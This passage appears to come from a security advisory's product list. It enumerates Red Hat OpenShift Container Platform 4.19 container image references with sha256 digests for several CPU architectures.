"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:c180d76665303a1c806911447f34c843011c3060ca198a5238ed0f64d9becc74_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:6194a64d8e710070fd29abdd118703c215ff6651c1356186f39ad59d5cc51bcd_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:c185f56cb3ae0d3f522cc459da340e3b939bbdd1543258c6a2e7cf87f2045c7b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:e6b13406fbaea6295e5bffbef0b109513d8b22286b992e6ebe9bf23095475b87_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:ed6c2f8bfe2a67e986e090d39ecee8713e2fb0f85e87ba89652174c977845d95_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9@sha256:0d15b65a5b1e662400e81798702500b889e3256644d84ddcbfebb9a70c1a1cf4_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9@sha256:2667a7138ce10557824bf4f5337c2cb9d3c4c3aee56f3d303aebcce4d7d79006_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9@sha256:2c8bfcde38a23b93e8474a20f98c6dd58b6fbd1d5c0773a45cab9e56f8796cc3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9@sha256:b391bcc49e93b19233c4a25cace7e2a787232bf2d915939440184752f09a18e9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:0f31780ee3816f6e40944c0429b36eec3de2d2be03e85494498d3df2f2667cc4_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:176ac0dff111c759bee1251925874b63b60c5f42fbefae44c6518928abf7f58b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:7b2a691e66dfffb9f0a36d4069db83c068d3792e1b16e426585d164b24b608aa_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:a8407b116617836506303cc1d9c3d8dbeb6a134923a9bb6dfd41435495a48a0b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:46f5aedf9bffb142d8da9d0420180b95e658101190b32ce1c86da1c53c1111bc_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:718a20a7c4b91391c72ed16452d3dd0fcf667ce3912cdcb96d4d5cb0b476958a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:8a660d559fa1d4b5facdaebe5a55bb8706cc0f098591d3552446d45b533adf81_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:fcf9efa15997c8fa9dc9a1681ac14ea46e0e959cf4a33933440103715b2c6617_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9-operator@sha256:75f4a2547e299c901ce632bc3f7770717b0b52a5d3fe79b4687406ff05490e0b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9-operator@sha256:96d19a18b20a9e8ed81918aa1ad3b12e7a8ed4786f3d655d3e6c61a1362c5ea5_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9@sha256:6171572cbb98e637db55e72ae4f00bf1e64166e65485825c83bdf6031339f581_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9@sha256:8524355b257cafb5460396c2b2f85eaa803c7bdaeaf31d5eb55528917eb94d47_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-nfs-rhel9@sha256:3733c9a79c632dda29eb7635740f4ab45234207be76bf6689fe75037a941fd1f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-nfs-rhel9@sha256:fdf560dc1b05690089f38a02e103c01be9156c4a5bb6c4d8faae4111e27aa92b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:1045e8dc9ce690faf4cf4868b2c8ab4984d26887ff2d8d7390cad475099d6226_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:3de13524a55ba2dd2013834445ad7d04de251303e67cd49df82a1274c4e5d5df_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:6eac8f9c6ff815dc2113652386ea7a0905e7ab0a008d2d89dba5d9bed116b61d_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:eec95e6623fd06e16ba393b102f2cfb268037e4379743423093d56fe2fc42dea_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:076a61f04e000b8c1c6d3192342a3112905e9ea05b2c060d6b68b1da0c7c2ca0_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:75bdfd4e0a6c82ae908e82835b11447b4af89bbfcfe7544c9aeff54adf2452a2_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:7715c2111abc77e11b7544eb351b9799d0d0fc029958e34680673d225581bdbd_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:9c354366074059d7be301b438cec1791479ced4f77a1b3702552755a12d4de32_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:385e609692f2d6ba0f6512eca051371f15471d6a4ac86de4fdeb2059c1cb9ddc_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:5aa042fbd253a7e644468a8a6a7df06a206bb5556ba4d2e0bf36a12bfeaf1bd4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:5f47a5d1025b8499572c93c4fbd1c8596e8afb2291a3408db77bb0d475b179a6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:5ff1fab804d261aa3ef884e9288eadaea59bf40a26face259decb7e3a686a85f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:15fa093433263f5b73be4d59d0bbadaa6f0201f0d8bb0e72ed4187db8ebd4ecd_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:58059ecb3d457599d000a7a113b943e53bfdaed0225b6df8cda9ff83f1c30b21_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:5f723bb5d81abb468b45850e894aa3f719cbac259b5a425b1abf3fffba3d7866_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:fb63e1f96831506bc79fbdd4f78ee9da3913f86f128f538db70a8badc23ac854_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:07a5ff47f0ddbc7ac2293a6f6af6ed2a9cb4027e7ad61042863187df69babda3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:1fbb335fd71191a6096d16c4769716255b833d9fbbfa60d4f12dc014e5d24da2_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:b8a54951f2fb26aa2b0cc93634a7147e4f2fa68a6986c527c5fda7ced2007e90_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:be5b247472e8155811e40b74a539d15d649c6175e469184aae7cc7a3ae435563_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:0f01b3199d4bbd7d691bd416ce41adb2123807534c965355e03ae0469425eb89_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:387d9d633840c30c52695f776e48e80031e110b05c9ef082597a5cdbf9f5eea2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:68f71f58e04099967346c0fae031fde60887bbb7dd1041c4d83a0b98455dabd1_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:df471031bae8d15bb58bc650ab6d4b9f4fa3f0483cb65838ad147594ec9f33af_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:07dfb0c56f132cd5acf76e5879f521be9abdcf5dc4e2fc663e89739f5e0d5538_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:8f02237f34890ade5878008f0c923597951019454ac5353a63c6616dd33f8f2d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:9979f3eec067571040422a0ad1b96b993a415bf2743960292df2a95b279ca695_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:b46b98d3ad75e63e9be7b603a77e27075653ec3afb7e8689fdd182cf40abd3f8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:3582bf5119513e9d51d83e2d1b3f70a955d2a0675e0b120ba7f6394e94b94e03_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:6b0e909a37e06abaa39c795be926d2da861b9f00fd4c0be18fe7890d825cb6ed_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:ab94610c1dd35f92ad186846735758cf5a301d9bc4e883b2692011988edb4fd3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:cf8b7ce2d36bccb2bcbee8bfd0de6bdae5dc40b0199059b2759d0aba56151baa_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:510a2039d88a9f1ae59848d4f6589b7585f002c68f0da8f8a970685d7fb40a5e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:6db47ba74f791eb39da7af1862d8978da61cbfd88219441950861ef469cbe472_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:6ec129d640af33af43d698593ae543d22394d0b7bb19b2fd89dfd257e5629ba3_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:f09043d293b8948f83da5b5722a0edb74ae3f54b58eeea19c490c0112bad2071_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:802e9ee888afb88e576fee42f11c7ee0d6fcbfb7b5213df16cac12c2b75a1d7c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:8cc4458a66fce822d175559277398c7aef9ddb383399efaf80650c2f350505fd_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:bfbaa99fb697f2a352b97de52a35729481556ac4ad3efadf6b796356a2830fd3_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:c1de6ec5108a02b21c15f44308fc3a9b4293f94353c0f25f11576a74fb21ce5d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:622a5b555fb855d565a2c66137c248a239a364c00671d271782695d144d8a56d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:640febb01fbe420ea03dcf3cc19bb8d0c9cf26c4af953133d51347baef830441_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:ce22905d9a22de00509343c81f9400e436132912a9ae6ddf675c0928f3ea4d27_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:d07ec10275070567596dfccce0a09bd2fbed9d5d452a813f26b1aa3d313b9d71_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cloud-controller-manager-rhel9@sha256:7ecb1d8a291da4a5113355fb9cd53efbe82879d419678800984d8d2b0b1e2b60_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cloud-controller-manager-rhel9@sha256:aa490b00e5c8c799fed61101cdcb32447eab6caf4c4c1037f1a7f9b5ee5c2500_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cloud-controller-manager-rhel9@sha256:ac962f2ec19c1cf0922a5af1d60c6535da0d2bb2e3b1f2bf60f559e7c91fa659_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cluster-api-controllers-rhel9@sha256:211d64fbaf9ecb4d767c4fddea4eadf048ff3783ab8aa28bde76844eaa735361_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cluster-api-controllers-rhel9@sha256:c373f479b51f2bd757cac4f24479cb9056d7745d588cd3a563c364dd63a55d88_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cluster-api-controllers-rhel9@sha256:fadf5aa90de3fda8b5253c6338406a0eb64866e3f3aab1bfc5f5c0713f3c4277_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-operator-rhel9@sha256:b8604b708e45c6b23f0f82a5dca52077d30819e646da9d45cf7f93bcbf58f3ce_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-operator-rhel9@sha256:e089a7b006efdb5583e05d087a02e0e0416577e913e3d5c6f4cff6918d564436_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-operator-rhel9@sha256:eb327d173c6e77b0c6a60c3774ba0246ce5e2df01639e7bbb59952e9b92e65f6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:7cf202edc41319fe4b36e57b8663292e9cd6a04c632237a5184a0b441dfcf761_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:b3cb2b6d300c2b2d579c7f8c7f66b52fbc891717e29d7b85c204b518093f529f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:b9332849e3b7652afc5dcad447cabeeb884066723a3b174c43fdd39d5651c67e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:50f27ddd76331df3b0b34c55391976f546f664f0d7a34130fc57c0d8ba9ee75f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:5ff71a6725a51510527d6497b921474a5e735dd4cb53b984ed8af54595b1cd1a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:70b4576443acce236a5bc1244d7bb7ccd11c22b307e8d302fd0038dfc61efa73_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:c948760bcc0d498230283dc4126370ac9e98eb1d0bdceccdc0a5f20f8b851b9c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:596d00eb17bd6f00e2b26605db7a54bf04425c6a8a188f5a373643530a4c79ca_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:c3fddc9f6c1e96c29dc018fb30d9f70814390cc4b111089264d4cc82378da5ad_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:dae117e1d6954cb63417510332fc70b5bafb19e0cc618fc103ef4b6581ecbfdb_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:fb23578b8ce937223392967c69b130551572dfab261815242d42ab090f999853_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:720cd3b89d18772d0230731f18dadae46bdb48b4b83d4c3c2afee787eb966f49_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:b207edd030f98804d2dd7a7055b5bb5bfa5008c3c6753ecaffb7fbc0bf18d56a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:e3a086f93b62590794af9f69fc273b3125fd88184e8467b3531d02521282ca06_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:fb2ea87732bd32c58d57656d38d3393bc7c48bb6edc41bc23464dc25ec2c72b7_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:1a62f6e266959b7ac07e5b79dfec40cd78be425a6b394b8201857632067db88d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:42e9b35962e1716efd05d11f66862be9711397b87be5c16de41ca67e4fb123db_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:9549947e4c8b0005815e651ebc1cbde8adeed54d89ace772f7c87210624cf587_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:e6ef275bd908e468f74c371734c00cc8e34fda230407b11caca2ca0e4a8cb98a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-cloud-controller-manager-rhel9@sha256:a02dab2c1d82d33beb22f0d834e89ee5d9d000717c5c9773a86315446222e3d5_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-cloud-controller-manager-rhel9@sha256:b692a262776393fe214b1f5e16690098f0ba9c52da91ef168d67915bd4d915b6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9-operator@sha256:0eec1806c1aebb18c929da840845a8acff65ddc2066d343f2d02b3dd080954e1_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9-operator@sha256:d82c48027fa2cc1aa104eaca2dfc6c556316cbf6a1bd6b0cacfb5ce8f010c028_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9@sha256:36145ed08ac5a3071011ff44e0411e3ded8d3483cf59d296c4795043f13f8e10_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9@sha256:6b27224dacb73ea14d2d561add8d93b960a69b602233731b29b134ad732de8d6_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibmcloud-cluster-api-controllers-rhel9@sha256:5dd61548a039d382bb8e0af3e31dfff8d6ec4c5edfccff587c94ece6e8b53281_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibmcloud-cluster-api-controllers-rhel9@sha256:e0ca3155faa73128c74048ce8082773be395f0072b87d01b9f4cd973f48d5486_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibmcloud-cluster-api-controllers-rhel9@sha256:fd6b29e7ed8f0d58789237c6cb855980611e3d03bcd0628ba4ba8e6beff4c155_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibmcloud-machine-controllers-rhel9@sha256:8d950f862e7b1c75962ed4357e08b0b071f606dc9fa797e10708cbd69dccc705_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibmcloud-machine-controllers-rhel9@sha256:bf3fa8833ab188a275570bc9f3e58dc4f174015221c3d7aa388468b38b2aec5c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-image-customization-controller-rhel9@sha256:173bbd5617f3d72c0b111b073dfba182a6e13562cc205ac707610e4bc99c1b24_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-image-customization-controller-rhel9@sha256:4efe2d4316675a37da7f0536a891bcf2e4aeadf52bdc4678e6946f8884d3b4fe_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:0745552aff8b52b7c604cb52765a1aa4ac038b856cf0ceaa61db217515dc9337_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:b88a20e45675d4a9a238d64cb0b6dacc162b4ec207251e5ae7c68303644ac306_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:c5227faf255e647c6444c423132e4de3562ac3279a17a2665be03d4e6bba9750_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:ed35e169497b1564059e5bffeba1da87648ce27b7f6a09474d25a19bd22cf9bf_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:084a30f22516957c012928dcca3c9729cdb9e6199039e758c9d468cd22c1244a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:60bf3d574a9289b95a0d999a8e653df107ee3fa888bf367436aee7417ceaf3c4_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:9dd7dfbd3499b485fd5765aba6384127c2777796ec50b182fc7ef63303835bc0_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:a3169dfd6918dd2108992611cdd3f14525e9f5e5d05cbd174007373ca3442c5c_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:10bda9f9f7f635c444b59e1d0db17776fe52ce9a3e39aba1d0ad339cde9dfcd3_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:21db43c73f7fe5af15ce187586dee84e949ea0a8a3f10fb2da428b3806b3c686_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:723e5bc45bbcfcd5d3ae97339bba491d383876c094f17f8300be5ed6fdc9591f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:f54ba33d1bcd4d7053ee4baf0d16a2b5af52f0e5a123f6c3bd0976ddacd027a4_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-agent-rhel9@sha256:3e31d1ece33dffbe5b4d54b888a2d16fe2137f6f35c99a7e5122ff8e0125250d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-agent-rhel9@sha256:dd33a77af11d0f36915205c343eff9bfa86a9a774d82796e6e1f0d8bf454defd_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-machine-os-downloader-rhel9@sha256:47995224ef8ebb0c96f589b4e65d0303ec25cdf337f1593443e5558f58820748_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-machine-os-downloader-rhel9@sha256:e33a0af2825ccfcd6d29470feabfd1710adda01a7a189957f04cc76d02e504db_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-rhel9@sha256:46ce51221a7b62f026ea8958b2e70a4956e48dfffe46196941a232a0a0374e9c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-rhel9@sha256:f5f3cef14751cc722c6d793f20f2f29e51dcb50eb0a27f182e1cb5cef0a169db_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-static-ip-manager-rhel9@sha256:02b842b08e52152114669293b4e74a0be77c6b142157787d0a394830ea71f376_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-static-ip-manager-rhel9@sha256:f2487a02cdd1eef6fb3b9462a39768a8f51110bf9321bc7229898a0c7d7dec4a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:2f381d5e585969b0ec3585d0b3ad338dd8067af067835993832abd50b9094957_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:bf2079d194c311cb1d41b1004f20753190145015c5dd9cdf124c46f62b9e4a15_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:dda8095185ee7997bb9a804fe5a2ebf519e5a5cf53a70439ff2771d21bc24f41_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:f51f73917d40e7fc6eab7e9700eb2c253f16c62173d103eb6b38daba651e17cf_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:4b6046eefed5840fa2ded2d2164a088ed3cfd22b50c2c05ebafd92a3190e1854_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:b71de8c64a624d154400844e3f95992e3c5c4090adeecb5158404a6b4cac6be5_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:c471af7de03ccb0fd093a774ee727a3d7712fc073773ad6e0180004d3d1f8fba_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:dbfe8e54acdfbfc04d1014cae94d227bd45e92d127139a615312e1012485dfa7_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:3509c3e8eaea4bd214c01ad94d9f9f7ce342103e2cecbc1badacfe4b968946e5_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:b06062b58d2db8dae5dfdf6cb413858d5c79f7935d59c1d2397c81d40e377d88_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:dae79f64ec77c8deccdad3c4b451940387d8a081e5cdec911c43c5d475b32256_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:fdae399bd29a16232ccaf26fb70b74685c899c0a2ee12910b71a8ae3fcf268ef_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:6267c3fdcdc21c0af4b42a9aa609f164956f0e996162bc87d7466453aa2aad35_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:85a45cc6d79a04a9175d26598325f0a4a1dd3fc279c99aeabe1a6293acc97506_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:aff5468f2fbe57381b15f3e7ca5bcc6b970d554ba239704ec256252b4eddf141_ppc64le",
